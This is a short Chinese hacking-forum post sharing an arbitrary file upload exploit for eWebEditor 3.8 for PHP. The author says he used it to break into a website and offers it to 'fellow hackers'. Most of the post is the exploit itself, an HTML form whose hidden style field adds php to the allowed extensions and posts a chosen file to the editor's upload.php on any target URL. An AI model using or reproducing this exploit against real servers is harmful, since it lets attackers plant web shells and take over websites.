eWebeditoR3.8 for php任意文件上传EXP - 脚本漏洞 - Nuclear'Atk（核攻击）网络安全实验室

By：振兴家电

一次搞一个站的时候找了半天才找到的一个EXP  靠这个EXP搞定了那个站！给黑友们分享下~

eWebeditoR3.8 for php任意文件上传EXP：

<title>eWebeditoR3.8 for php任意文件上EXP</title>
<form action="" method=post enctype="multipart/form-data">
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
URL:<input type=text name=url value="http://www.xxxxx.com/ewebeditor/" size=100><br>
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
file:<input type=file name="uploadfile"><br>
<input type=button value=submit onclick=fsubmit()>
</form><br>
<script>
function fsubmit(){
form = document.forms[0];
form.action = form.url.value+'php/upload.php?action=save&type=FILE&style=toby57&language=en';
alert(form.action);
form.submit();
}
</script>

文章目录